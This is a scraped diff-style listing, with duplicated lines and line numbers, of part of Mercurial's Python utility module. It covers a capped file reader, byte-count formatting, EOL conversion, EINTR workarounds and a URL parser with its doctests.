limit are treated as EOF.

2306

limit are treated as EOF.

2294

2307

2295

It is assumed that I/O is not performed on the original file object

2308

It is assumed that I/O is not performed on the original file object

2296

in addition to I/O that is performed by this instance. If there is,

2309

in addition to I/O that is performed by this instance. If there is,

2297

state tracking will get out of sync and unexpected results will ensue.

2310

state tracking will get out of sync and unexpected results will ensue.

2298

"""

2311

"""

2299

def __init__(self, fh, limit):

2312

def __init__(self, fh, limit):

2300

"""Allow reading up to <limit> bytes from <fh>."""

2313

"""Allow reading up to <limit> bytes from <fh>."""

2301

self._fh = fh

2314

self._fh = fh

2302

self._left = limit

2315

self._left = limit

2303

2316

2304

def read(self, n=-1):

2317

def read(self, n=-1):

2305

if not self._left:

2318

if not self._left:

2306

return b''

2319

return b''

2307

2320

2308

if n < 0:

2321

if n < 0:

2309

n = self._left

2322

n = self._left

2310

2323

2311

data = self._fh.read(min(n, self._left))

2324

data = self._fh.read(min(n, self._left))

2312

self._left -= len(data)

2325

self._left -= len(data)

2313

assert self._left >= 0

2326

assert self._left >= 0

2314

2327

2315

return data

2328

return data

2316

2329

2317

def readinto(self, b):

2330

def readinto(self, b):

2318

res = self.read(len(b))

2331

res = self.read(len(b))

2319

if res is None:

2332

if res is None:

2320

return None

2333

return None

2321

2334

2322

b[0:len(res)] = res

2335

b[0:len(res)] = res

2323

return len(res)

2336

return len(res)

2324

2337

2325

def unitcountfn(*unittable):

2338

def unitcountfn(*unittable):

2326

'''return a function that renders a readable count of some quantity'''

2339

'''return a function that renders a readable count of some quantity'''

2327

2340

2328

def go(count):

2341

def go(count):

2329

for multiplier, divisor, format in unittable:

2342

for multiplier, divisor, format in unittable:

2330

if abs(count) >= divisor * multiplier:

2343

if abs(count) >= divisor * multiplier:

2331

return format % (count / float(divisor))

2344

return format % (count / float(divisor))

2332

return unittable[-1][2] % count

2345

return unittable[-1][2] % count

2333

2346

2334

return go

2347

return go

2335

2348

2336

def processlinerange(fromline, toline):

2349

def processlinerange(fromline, toline):

2337

"""Check that linerange <fromline>:<toline> makes sense and return a

2350

"""Check that linerange <fromline>:<toline> makes sense and return a

2338

0-based range.

2351

0-based range.

2339

2352

2340

>>> processlinerange(10, 20)

2353

>>> processlinerange(10, 20)

2341

(9, 20)

2354

(9, 20)

2342

>>> processlinerange(2, 1)

2355

>>> processlinerange(2, 1)

2343

Traceback (most recent call last):

2356

Traceback (most recent call last):

2344

...

2357

...

2345

ParseError: line range must be positive

2358

ParseError: line range must be positive

2346

>>> processlinerange(0, 5)

2359

>>> processlinerange(0, 5)

2347

Traceback (most recent call last):

2360

Traceback (most recent call last):

2348

...

2361

...

2349

ParseError: fromline must be strictly positive

2362

ParseError: fromline must be strictly positive

2350

"""

2363

"""

2351

if toline - fromline < 0:

2364

if toline - fromline < 0:

2352

raise error.ParseError(_("line range must be positive"))

2365

raise error.ParseError(_("line range must be positive"))

2353

if fromline < 1:

2366

if fromline < 1:

2354

raise error.ParseError(_("fromline must be strictly positive"))

2367

raise error.ParseError(_("fromline must be strictly positive"))

2355

return fromline - 1, toline

2368

return fromline - 1, toline

2356

2369

2357

bytecount = unitcountfn(

2370

bytecount = unitcountfn(

2358

(100, 1 << 30, _('%.0f GB')),

2371

(100, 1 << 30, _('%.0f GB')),

2359

(10, 1 << 30, _('%.1f GB')),

2372

(10, 1 << 30, _('%.1f GB')),

2360

(1, 1 << 30, _('%.2f GB')),

2373

(1, 1 << 30, _('%.2f GB')),

2361

(100, 1 << 20, _('%.0f MB')),

2374

(100, 1 << 20, _('%.0f MB')),

2362

(10, 1 << 20, _('%.1f MB')),

2375

(10, 1 << 20, _('%.1f MB')),

2363

(1, 1 << 20, _('%.2f MB')),

2376

(1, 1 << 20, _('%.2f MB')),

2364

(100, 1 << 10, _('%.0f KB')),

2377

(100, 1 << 10, _('%.0f KB')),

2365

(10, 1 << 10, _('%.1f KB')),

2378

(10, 1 << 10, _('%.1f KB')),

2366

(1, 1 << 10, _('%.2f KB')),

2379

(1, 1 << 10, _('%.2f KB')),

2367

(1, 1, _('%.0f bytes')),

2380

(1, 1, _('%.0f bytes')),

2368

)

2381

)

2369

2382

2370

class transformingwriter(object):

2383

class transformingwriter(object):

2371

"""Writable file wrapper to transform data by function"""

2384

"""Writable file wrapper to transform data by function"""

2372

2385

2373

def __init__(self, fp, encode):

2386

def __init__(self, fp, encode):

2374

self._fp = fp

2387

self._fp = fp

2375

self._encode = encode

2388

self._encode = encode

2376

2389

2377

def close(self):

2390

def close(self):

2378

self._fp.close()

2391

self._fp.close()

2379

2392

2380

def flush(self):

2393

def flush(self):

2381

self._fp.flush()

2394

self._fp.flush()

2382

2395

2383

def write(self, data):

2396

def write(self, data):

2384

return self._fp.write(self._encode(data))

2397

return self._fp.write(self._encode(data))

2385

2398

2386

# Matches a single EOL which can either be a CRLF where repeated CR

2399

# Matches a single EOL which can either be a CRLF where repeated CR

2387

# are removed or a LF. We do not care about old Macintosh files, so a

2400

# are removed or a LF. We do not care about old Macintosh files, so a

2388

# stray CR is an error.

2401

# stray CR is an error.

2389

_eolre = remod.compile(br'\r*\n')

2402

_eolre = remod.compile(br'\r*\n')

2390

2403

2391

def tolf(s):

2404

def tolf(s):

2392

return _eolre.sub('\n', s)

2405

return _eolre.sub('\n', s)

2393

2406

2394

def tocrlf(s):

2407

def tocrlf(s):

2395

return _eolre.sub('\r\n', s)

2408

return _eolre.sub('\r\n', s)

2396

2409

2397

def _crlfwriter(fp):

2410

def _crlfwriter(fp):

2398

return transformingwriter(fp, tocrlf)

2411

return transformingwriter(fp, tocrlf)

2399

2412

2400

if pycompat.oslinesep == '\r\n':

2413

if pycompat.oslinesep == '\r\n':

2401

tonativeeol = tocrlf

2414

tonativeeol = tocrlf

2402

fromnativeeol = tolf

2415

fromnativeeol = tolf

2403

nativeeolwriter = _crlfwriter

2416

nativeeolwriter = _crlfwriter

2404

else:

2417

else:

2405

tonativeeol = pycompat.identity

2418

tonativeeol = pycompat.identity

2406

fromnativeeol = pycompat.identity

2419

fromnativeeol = pycompat.identity

2407

nativeeolwriter = pycompat.identity

2420

nativeeolwriter = pycompat.identity

2408

2421

2409

if (pyplatform.python_implementation() == 'CPython' and

2422

if (pyplatform.python_implementation() == 'CPython' and

2410

sys.version_info < (3, 0)):

2423

sys.version_info < (3, 0)):

2411

# There is an issue in CPython that some IO methods do not handle EINTR

2424

# There is an issue in CPython that some IO methods do not handle EINTR

2412

# correctly. The following table shows what CPython version (and functions)

2425

# correctly. The following table shows what CPython version (and functions)

2413

# are affected (buggy: has the EINTR bug, okay: otherwise):

2426

# are affected (buggy: has the EINTR bug, okay: otherwise):

2414

#

2427

#

2415

# | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0

2428

# | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0

2416

# --------------------------------------------------

2429

# --------------------------------------------------

2417

# fp.__iter__ | buggy | buggy | okay

2430

# fp.__iter__ | buggy | buggy | okay

2418

# fp.read* | buggy | okay [1] | okay

2431

# fp.read* | buggy | okay [1] | okay

2419

#

2432

#

2420

# [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.

2433

# [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.

2421

#

2434

#

2422

# Here we workaround the EINTR issue for fileobj.__iter__. Other methods

2435

# Here we workaround the EINTR issue for fileobj.__iter__. Other methods

2423

# like "read*" are ignored for now, as Python < 2.7.4 is a minority.

2436

# like "read*" are ignored for now, as Python < 2.7.4 is a minority.

2424

#

2437

#

2425

# Although we can workaround the EINTR issue for fp.__iter__, it is slower:

2438

# Although we can workaround the EINTR issue for fp.__iter__, it is slower:

2426

# "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in

2439

# "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in

2427

# CPython 2, because CPython 2 maintains an internal readahead buffer for

2440

# CPython 2, because CPython 2 maintains an internal readahead buffer for

2428

# fp.__iter__ but not other fp.read* methods.

2441

# fp.__iter__ but not other fp.read* methods.

2429

#

2442

#

2430

# On modern systems like Linux, the "read" syscall cannot be interrupted

2443

# On modern systems like Linux, the "read" syscall cannot be interrupted

2431

# when reading "fast" files like on-disk files. So the EINTR issue only

2444

# when reading "fast" files like on-disk files. So the EINTR issue only

2432

# affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)

2445

# affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)

2433

# files approximately as "fast" files and use the fast (unsafe) code path,

2446

# files approximately as "fast" files and use the fast (unsafe) code path,

2434

# to minimize the performance impact.

2447

# to minimize the performance impact.

2435

if sys.version_info >= (2, 7, 4):

2448

if sys.version_info >= (2, 7, 4):

2436

# fp.readline deals with EINTR correctly, use it as a workaround.

2449

# fp.readline deals with EINTR correctly, use it as a workaround.

2437

def _safeiterfile(fp):

2450

def _safeiterfile(fp):

2438

return iter(fp.readline, '')

2451

return iter(fp.readline, '')

2439

else:

2452

else:

2440

# fp.read* are broken too, manually deal with EINTR in a stupid way.

2453

# fp.read* are broken too, manually deal with EINTR in a stupid way.

2441

# note: this may block longer than necessary because of bufsize.

2454

# note: this may block longer than necessary because of bufsize.

2442

def _safeiterfile(fp, bufsize=4096):

2455

def _safeiterfile(fp, bufsize=4096):

2443

fd = fp.fileno()

2456

fd = fp.fileno()

2444

line = ''

2457

line = ''

2445

while True:

2458

while True:

2446

try:

2459

try:

2447

buf = os.read(fd, bufsize)

2460

buf = os.read(fd, bufsize)

2448

except OSError as ex:

2461

except OSError as ex:

2449

# os.read only raises EINTR before any data is read

2462

# os.read only raises EINTR before any data is read

2450

if ex.errno == errno.EINTR:

2463

if ex.errno == errno.EINTR:

2451

continue

2464

continue

2452

else:

2465

else:

2453

raise

2466

raise

2454

line += buf

2467

line += buf

2455

if '\n' in buf:

2468

if '\n' in buf:

2456

splitted = line.splitlines(True)

2469

splitted = line.splitlines(True)

2457

line = ''

2470

line = ''

2458

for l in splitted:

2471

for l in splitted:

2459

if l[-1] == '\n':

2472

if l[-1] == '\n':

2460

yield l

2473

yield l

2461

else:

2474

else:

2462

line = l

2475

line = l

2463

if not buf:

2476

if not buf:

2464

break

2477

break

2465

if line:

2478

if line:

2466

yield line

2479

yield line

2467

2480

2468

def iterfile(fp):

2481

def iterfile(fp):

2469

fastpath = True

2482

fastpath = True

2470

if type(fp) is file:

2483

if type(fp) is file:

2471

fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)

2484

fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)

2472

if fastpath:

2485

if fastpath:

2473

return fp

2486

return fp

2474

else:

2487

else:

2475

return _safeiterfile(fp)

2488

return _safeiterfile(fp)

2476

else:

2489

else:

2477

# PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.

2490

# PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.

2478

def iterfile(fp):

2491

def iterfile(fp):

2479

return fp

2492

return fp

2480

2493

2481

def iterlines(iterator):

2494

def iterlines(iterator):

2482

for chunk in iterator:

2495

for chunk in iterator:

2483

for line in chunk.splitlines():

2496

for line in chunk.splitlines():

2484

yield line

2497

yield line

2485

2498

2486

def expandpath(path):

2499

def expandpath(path):

2487

return os.path.expanduser(os.path.expandvars(path))

2500

return os.path.expanduser(os.path.expandvars(path))

2488

2501

2489

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):

2502

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):

2490

"""Return the result of interpolating items in the mapping into string s.

2503

"""Return the result of interpolating items in the mapping into string s.

2491

2504

2492

prefix is a single character string, or a two character string with

2505

prefix is a single character string, or a two character string with

2493

a backslash as the first character if the prefix needs to be escaped in

2506

a backslash as the first character if the prefix needs to be escaped in

2494

a regular expression.

2507

a regular expression.

2495

2508

2496

fn is an optional function that will be applied to the replacement text

2509

fn is an optional function that will be applied to the replacement text

2497

just before replacement.

2510

just before replacement.

2498

2511

2499

escape_prefix is an optional flag that allows using doubled prefix for

2512

escape_prefix is an optional flag that allows using doubled prefix for

2500

its escaping.

2513

its escaping.

2501

"""

2514

"""

2502

fn = fn or (lambda s: s)

2515

fn = fn or (lambda s: s)

2503

patterns = '|'.join(mapping.keys())

2516

patterns = '|'.join(mapping.keys())

2504

if escape_prefix:

2517

if escape_prefix:

2505

patterns += '|' + prefix

2518

patterns += '|' + prefix

2506

if len(prefix) > 1:

2519

if len(prefix) > 1:

2507

prefix_char = prefix[1:]

2520

prefix_char = prefix[1:]

2508

else:

2521

else:

2509

prefix_char = prefix

2522

prefix_char = prefix

2510

mapping[prefix_char] = prefix_char

2523

mapping[prefix_char] = prefix_char

2511

r = remod.compile(br'%s(%s)' % (prefix, patterns))

2524

r = remod.compile(br'%s(%s)' % (prefix, patterns))

2512

return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

2525

return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

2513

2526

2514

def getport(port):

2527

def getport(port):

2515

"""Return the port for a given network service.

2528

"""Return the port for a given network service.

2516

2529

2517

If port is an integer, it's returned as is. If it's a string, it's

2530

If port is an integer, it's returned as is. If it's a string, it's

2518

looked up using socket.getservbyname(). If there's no matching

2531

looked up using socket.getservbyname(). If there's no matching

2519

service, error.Abort is raised.

2532

service, error.Abort is raised.

2520

"""

2533

"""

2521

try:

2534

try:

2522

return int(port)

2535

return int(port)

2523

except ValueError:

2536

except ValueError:

2524

pass

2537

pass

2525

2538

2526

try:

2539

try:

2527

return socket.getservbyname(pycompat.sysstr(port))

2540

return socket.getservbyname(pycompat.sysstr(port))

2528

except socket.error:

2541

except socket.error:

2529

raise error.Abort(_("no port number associated with service '%s'")

2542

raise error.Abort(_("no port number associated with service '%s'")

2530

% port)

2543

% port)

2531

2544

2532

class url(object):

2545

class url(object):

2533

r"""Reliable URL parser.

2546

r"""Reliable URL parser.

2534

2547

2535

This parses URLs and provides attributes for the following

2548

This parses URLs and provides attributes for the following

2536

components:

2549

components:

2537

2550

2538

2551

2539

2552

2540

Missing components are set to None. The only exception is

2553

Missing components are set to None. The only exception is

2541

fragment, which is set to '' if present but empty.

2554

fragment, which is set to '' if present but empty.

2542

2555

2543

If parsefragment is False, fragment is included in query. If

2556

If parsefragment is False, fragment is included in query. If

2544

parsequery is False, query is included in path. If both are

2557

parsequery is False, query is included in path. If both are

2545

False, both fragment and query are included in path.

2558

False, both fragment and query are included in path.

2546

2559

2547

See http://www.ietf.org/rfc/rfc2396.txt for more information.

2560

See http://www.ietf.org/rfc/rfc2396.txt for more information.

2548

2561

2549

Note that for backward compatibility reasons, bundle URLs do not

2562

Note that for backward compatibility reasons, bundle URLs do not

2550

take host names. That means 'bundle://../' has a path of '../'.

2563

take host names. That means 'bundle://../' has a path of '../'.

2551

2564

2552

Examples:

2565

Examples:

2553

2566

2554

>>> url(b'http://www.ietf.org/rfc/rfc2396.txt')

2567

>>> url(b'http://www.ietf.org/rfc/rfc2396.txt')

2555

2568

2556

>>> url(b'ssh://[::1]:2200//home/joe/repo')

2569

>>> url(b'ssh://[::1]:2200//home/joe/repo')

2557

2570

2558

>>> url(b'file:///home/joe/repo')

2571

>>> url(b'file:///home/joe/repo')

2559

2572

2560

>>> url(b'file:///c:/temp/foo/')

2573

>>> url(b'file:///c:/temp/foo/')

2561

2574

2562

>>> url(b'bundle:foo')

2575

>>> url(b'bundle:foo')

2563

2576

2564

>>> url(b'bundle://../foo')

2577

>>> url(b'bundle://../foo')

2565

2578

2566

>>> url(br'c:\foo\bar')

2579

>>> url(br'c:\foo\bar')

2567

2580

2568

>>> url(br'\\blah\blah\blah')

2581

>>> url(br'\\blah\blah\blah')

2569

2582

2570

>>> url(br'\\blah\blah\blah#baz')

2583

>>> url(br'\\blah\blah\blah#baz')

2571

2584

2572

>>> url(br'file:///C:\users\me')

2585

>>> url(br'file:///C:\users\me')

2573

2586

2574

2587

2575

Authentication credentials:

2588

Authentication credentials:

2576

2589

2577

>>> url(b'ssh://joe:xyz@x/repo')

2590

>>> url(b'ssh://joe:xyz@x/repo')

2578

2591

2579

>>> url(b'ssh://joe@x/repo')

2592

>>> url(b'ssh://joe@x/repo')

2580

2593

2581

2594

2582

Query strings and fragments:

2595

Query strings and fragments:

2583

2596

2584

>>> url(b'http://host/a?b#c')

2597

>>> url(b'http://host/a?b#c')

2585

2598

2586

>>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)

2599

>>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)

2587

2600

2588

2601

2589

Empty path:

2602

Empty path:

2590

2603

2591

>>> url(b'')

2604

>>> url(b'')

2592

2605

2593

>>> url(b'#a')

2606

>>> url(b'#a')

2594

2607

2595

>>> url(b'http://host/')

2608

>>> url(b'http://host/')

2596

2609

2597

>>> url(b'http://host/#a')

2610

>>> url(b'http://host/#a')

2598

2611

2599

2612

2600

Only scheme:

2613

Only scheme:

2601

2614

2602

>>> url(b'http:')

2615

>>> url(b'http:')

2603

2616

2604

"""

2617

"""

2605

2618

2606

_safechars = "!~*'()+"

2619

_safechars = "!~*'()+"

2607

_safepchars = "/!~*'()+:\\"

2620

_safepchars = "/!~*'()+:\\"

2608

_matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

2621

_matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

2609

2622

2610

def __init__(self, path, parsequery=True, parsefragment=True):

2623

def __init__(self, path, parsequery=True, parsefragment=True):

2611

# We slowly chomp away at path until we have only the path left

2624

# We slowly chomp away at path until we have only the path left

2612

self.scheme = self.user = self.passwd = self.host = None

2625

self.scheme = self.user = self.passwd = self.host = None

2613

self.port = self.path = self.query = self.fragment = None

2626

self.port = self.path = self.query = self.fragment = None

2614

self._localpath = True

2627

self._localpath = True

2615

self._hostport = ''

2628

self._hostport = ''

2616

self._origpath = path

2629

self._origpath = path

2617

2630

2618

if parsefragment and '#' in path:

2631

if parsefragment and '#' in path:

2619

path, self.fragment = path.split('#', 1)

2632

path, self.fragment = path.split('#', 1)

2620

2633

2621

# special case for Windows drive letters and UNC paths

2634

# special case for Windows drive letters and UNC paths

2622

if hasdriveletter(path) or path.startswith('\\\\'):

2635

if hasdriveletter(path) or path.startswith('\\\\'):

2623

self.path = path

2636

self.path = path

2624

return

2637

return

2625

2638

2626

# For compatibility reasons, we can't handle bundle paths as

2639

# For compatibility reasons, we can't handle bundle paths as

2627

# normal URLS

2640

# normal URLS

2628

if path.startswith('bundle:'):

2641

if path.startswith('bundle:'):

2629

self.scheme = 'bundle'

2642

self.scheme = 'bundle'

2630

path = path[7:]

2643

path = path[7:]

2631

if path.startswith('//'):

2644

if path.startswith('//'):

2632

path = path[2:]

2645

path = path[2:]

2633

self.path = path

2646

self.path = path

2634

return

2647

return

2635

2648

2636

if self._matchscheme(path):

2649

if self._matchscheme(path):

2637

parts = path.split(':', 1)

2650

parts = path.split(':', 1)

2638

if parts[0]:

2651

if parts[0]:

2639

self.scheme, path = parts

2652

self.scheme, path = parts

2640

self._localpath = False

2653

self._localpath = False

2641

2654

2642

if not path:

2655

if not path:

2643

path = None

2656

path = None

2644

if self._localpath:

2657

if self._localpath:

2645

self.path = ''

2658

self.path = ''

2646

return

2659

return

2647

else:

2660

else:

2648

if self._localpath:

2661

if self._localpath:

2649

self.path = path

2662

self.path = path

2650

return

2663

return

2651

2664

2652

if parsequery and '?' in path:

2665

if parsequery and '?' in path:

2653

path, self.query = path.split('?', 1)

2666

path, self.query = path.split('?', 1)

2654

if not path:

2667

if not path:

2655

path = None

2668

path = None

2656

if not self.query:

2669

if not self.query:

2657

self.query = None

2670

self.query = None

2658

2671

2659

# // is required to specify a host/authority

2672

# // is required to specify a host/authority

2660

if path and path.startswith('//'):

2673

if path and path.startswith('//'):

2661

parts = path[2:].split('/', 1)

2674

parts = path[2:].split('/', 1)

2662

if len(parts) > 1:

2675

if len(parts) > 1:

2663

self.host, path = parts

2676

self.host, path = parts

2664

else:

2677

else:

2665

self.host = parts[0]

2678

self.host = parts[0]

2666

path = None

2679

path = None

2667

if not self.host:

2680

if not self.host:

2668

self.host = None

2681

self.host = None

2669

# path of file:///d is /d

2682

# path of file:///d is /d

2670

# path of file:///d:/ is d:/, not /d:/

2683

# path of file:///d:/ is d:/, not /d:/

2671

if path and not hasdriveletter(path):

2684

if path and not hasdriveletter(path):

2672

path = '/' + path

2685

path = '/' + path

2673

2686

2674

if self.host and '@' in self.host:

2687

if self.host and '@' in self.host:

2675

self.user, self.host = self.host.rsplit('@', 1)

2688

self.user, self.host = self.host.rsplit('@', 1)

2676

if ':' in self.user:

2689

if ':' in self.user:

2677

self.user, self.passwd = self.user.split(':', 1)

2690

self.user, self.passwd = self.user.split(':', 1)

2678

if not self.host:

2691

if not self.host:

2679

self.host = None

2692

self.host = None

2680

2693

2681

# Don't split on colons in IPv6 addresses without ports

2694

# Don't split on colons in IPv6 addresses without ports

2682

if (self.host and ':' in self.host and

2695

if (self.host and ':' in self.host and

2683

not (self.host.startswith('[') and self.host.endswith(']'))):

2696

not (self.host.startswith('[') and self.host.endswith(']'))):

2684

self._hostport = self.host

2697

self._hostport = self.host

2685

self.host, self.port = self.host.rsplit(':', 1)

2698

self.host, self.port = self.host.rsplit(':', 1)

2686

if not self.host:

2699

if not self.host:

2687

self.host = None

2700

self.host = None

2688

2701

2689

if (self.host and self.scheme == 'file' and

2702

if (self.host and self.scheme == 'file' and

2690

self.host not in ('localhost', '127.0.0.1', '[::1]')):

2703

self.host not in ('localhost', '127.0.0.1', '[::1]')):

2691

raise error.Abort(_('file:// URLs can only refer to localhost'))

2704

raise error.Abort(_('file:// URLs can only refer to localhost'))

2692

2705

2693

self.path = path

2706

self.path = path

2694

2707

2695

# leave the query string escaped

2708

# leave the query string escaped

2696

for a in ('user', 'passwd', 'host', 'port',

2709

for a in ('user', 'passwd', 'host', 'port',

2697

'path', 'fragment'):

2710

'path', 'fragment'):

2698

v = getattr(self, a)

2711

v = getattr(self, a)

2699

if v is not None:

2712

if v is not None:

2700

setattr(self, a, urlreq.unquote(v))

2713

setattr(self, a, urlreq.unquote(v))

2701

2714

2702

@encoding.strmethod

2715

@encoding.strmethod

2703

def __repr__(self):

2716

def __repr__(self):

2704

attrs = []

2717

attrs = []

2705

for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',

2718

for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',

2706

'query', 'fragment'):

2719

'query', 'fragment'):

2707

v = getattr(self, a)

2720

v = getattr(self, a)

2708

if v is not None:

2721

if v is not None:

2709

attrs.append('%s: %r' % (a, pycompat.bytestr(v)))

2722

attrs.append('%s: %r' % (a, pycompat.bytestr(v)))

2710

return '<url %s>' % ', '.join(attrs)

2723

return '<url %s>' % ', '.join(attrs)

2711

2724

2712

def __bytes__(self):

2725

def __bytes__(self):

2713

r"""Join the URL's components back into a URL string.

2726

r"""Join the URL's components back into a URL string.

2714

2727

2715

Examples:

2728

Examples:

2716

2729

2717

>>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))

2730

>>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))

2718

'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'

2731

'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'

2719

>>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))

2732

>>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))

2720

'http://user:pw@host:80/?foo=bar&baz=42'

2733

'http://user:pw@host:80/?foo=bar&baz=42'

2721

>>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))

2734

>>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))

2722

'http://user:pw@host:80/?foo=bar%3dbaz'

2735

'http://user:pw@host:80/?foo=bar%3dbaz'

2723

>>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))

2736

>>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))

2724

'ssh://user:pw@[::1]:2200//home/joe#'

2737

'ssh://user:pw@[::1]:2200//home/joe#'

2725

>>> bytes(url(b'http://localhost:80//'))

2738

>>> bytes(url(b'http://localhost:80//'))

2726

'http://localhost:80//'

2739

'http://localhost:80//'

2727

>>> bytes(url(b'http://localhost:80/'))

2740

>>> bytes(url(b'http://localhost:80/'))

2728

'http://localhost:80/'

2741

'http://localhost:80/'

2729

>>> bytes(url(b'http://localhost:80'))

2742

>>> bytes(url(b'http://localhost:80'))

2730

'http://localhost:80/'

2743

'http://localhost:80/'

2731

>>> bytes(url(b'bundle:foo'))

2744

>>> bytes(url(b'bundle:foo'))

2732

'bundle:foo'

2745

'bundle:foo'

2733

>>> bytes(url(b'bundle://../foo'))

2746

>>> bytes(url(b'bundle://../foo'))

2734

'bundle:../foo'

2747

'bundle:../foo'

2735

>>> bytes(url(b'path'))

2748

>>> bytes(url(b'path'))

2736

'path'

2749

'path'

2737

>>> bytes(url(b'file:///tmp/foo/bar'))

2750

>>> bytes(url(b'file:///tmp/foo/bar'))

2738

'file:///tmp/foo/bar'

2751

'file:///tmp/foo/bar'

2739

>>> bytes(url(b'file:///c:/tmp/foo/bar'))

2752

>>> bytes(url(b'file:///c:/tmp/foo/bar'))

2740

'file:///c:/tmp/foo/bar'

2753

'file:///c:/tmp/foo/bar'

2741

>>> print(url(br'bundle:foo\bar'))

2754

>>> print(url(br'bundle:foo\bar'))

2742

bundle:foo\bar

2755

bundle:foo\bar

2743

>>> print(url(br'file:///D:\data\hg'))

2756

>>> print(url(br'file:///D:\data\hg'))

2744

file:///D:\data\hg

2757

file:///D:\data\hg

2745

"""

2758

"""

2746

if self._localpath:

2759

if self._localpath:

2747

s = self.path

2760

s = self.path

2748

if self.scheme == 'bundle':

2761

if self.scheme == 'bundle':

2749

s = 'bundle:' + s

2762

s = 'bundle:' + s

2750

if self.fragment:

2763

if self.fragment:

2751

s += '#' + self.fragment

2764

s += '#' + self.fragment

2752

return s

2765

return s

2753

2766

2754

s = self.scheme + ':'

2767

s = self.scheme + ':'

2755

if self.user or self.passwd or self.host:

2768

if self.user or self.passwd or self.host:

2756

s += '//'

2769

s += '//'

2757

elif self.scheme and (not self.path or self.path.startswith('/')

2770

elif self.scheme and (not self.path or self.path.startswith('/')

2758

or hasdriveletter(self.path)):

2771

or hasdriveletter(self.path)):

2759

s += '//'

2772

s += '//'

2760

if hasdriveletter(self.path):

2773

if hasdriveletter(self.path):

2761

s += '/'

2774

s += '/'

2762

if self.user:

2775

if self.user:

2763

s += urlreq.quote(self.user, safe=self._safechars)

2776

s += urlreq.quote(self.user, safe=self._safechars)

2764

if self.passwd:

2777

if self.passwd:

2765

s += ':' + urlreq.quote(self.passwd, safe=self._safechars)

2778

s += ':' + urlreq.quote(self.passwd, safe=self._safechars)

2766

if self.user or self.passwd:

2779

if self.user or self.passwd:

2767

s += '@'

2780

s += '@'

2768

if self.host:

2781

if self.host:

2769

if not (self.host.startswith('[') and self.host.endswith(']')):

2782

if not (self.host.startswith('[') and self.host.endswith(']')):

2770

s += urlreq.quote(self.host)

2783

s += urlreq.quote(self.host)

2771

else:

2784

else:

2772

s += self.host

2785

s += self.host

2773

if self.port:

2786

if self.port:

2774

s += ':' + urlreq.quote(self.port)

2787

s += ':' + urlreq.quote(self.port)

2775

if self.host:

2788

if self.host:

2776

s += '/'

2789

s += '/'

2777

if self.path:

2790

if self.path:

2778

# TODO: similar to the query string, we should not unescape the

2791

# TODO: similar to the query string, we should not unescape the

2779

# path when we store it, the path might contain '%2f' = '/',

2792

# path when we store it, the path might contain '%2f' = '/',

2780

# which we should *not* escape.

2793

# which we should *not* escape.

2781

s += urlreq.quote(self.path, safe=self._safepchars)

2794

s += urlreq.quote(self.path, safe=self._safepchars)

2782

if self.query:

2795

if self.query:

2783

# we store the query in escaped form.

2796

# we store the query in escaped form.

2784

s += '?' + self.query

2797

s += '?' + self.query

2785

if self.fragment is not None:

2798

if self.fragment is not None:

2786

s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)

2799

s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)

2787

return s

2800

return s

2788

2801

2789

__str__ = encoding.strmethod(__bytes__)

2802

__str__ = encoding.strmethod(__bytes__)

2790

2803

2791

def authinfo(self):

2804

def authinfo(self):

2792

user, passwd = self.user, self.passwd

2805

user, passwd = self.user, self.passwd

2793

try:

2806

try:

2794

self.user, self.passwd = None, None

2807

self.user, self.passwd = None, None

2795

s = bytes(self)

2808

s = bytes(self)

2796

finally:

2809

finally:

2797

self.user, self.passwd = user, passwd

2810

self.user, self.passwd = user, passwd

2798

if not self.user:

2811

if not self.user:

2799

return (s, None)

2812

return (s, None)

2800

# authinfo[1] is passed to urllib2 password manager, and its

2813

# authinfo[1] is passed to urllib2 password manager, and its

2801

# URIs must not contain credentials. The host is passed in the

2814

# URIs must not contain credentials. The host is passed in the

2802

# URIs list because Python < 2.4.3 uses only that to search for

2815

# URIs list because Python < 2.4.3 uses only that to search for

2803

# a password.

2816

# a password.

2804

return (s, (None, (s, self.host),

2817

return (s, (None, (s, self.host),

2805

self.user, self.passwd or ''))

2818

self.user, self.passwd or ''))

2806

2819

2807

def isabs(self):

2820

def isabs(self):

2808

if self.scheme and self.scheme != 'file':

2821

if self.scheme and self.scheme != 'file':

2809

return True # remote URL

2822

return True # remote URL

2810

if hasdriveletter(self.path):

2823

if hasdriveletter(self.path):

2811

return True # absolute for our purposes - can't be joined()

2824

return True # absolute for our purposes - can't be joined()

2812

if self.path.startswith(br'\\'):

2825

if self.path.startswith(br'\\'):

2813

return True # Windows UNC path

2826

return True # Windows UNC path

2814

if self.path.startswith('/'):

2827

if self.path.startswith('/'):

2815

return True # POSIX-style

2828

return True # POSIX-style

2816

return False

2829

return False

2817

2830

2818

def localpath(self):

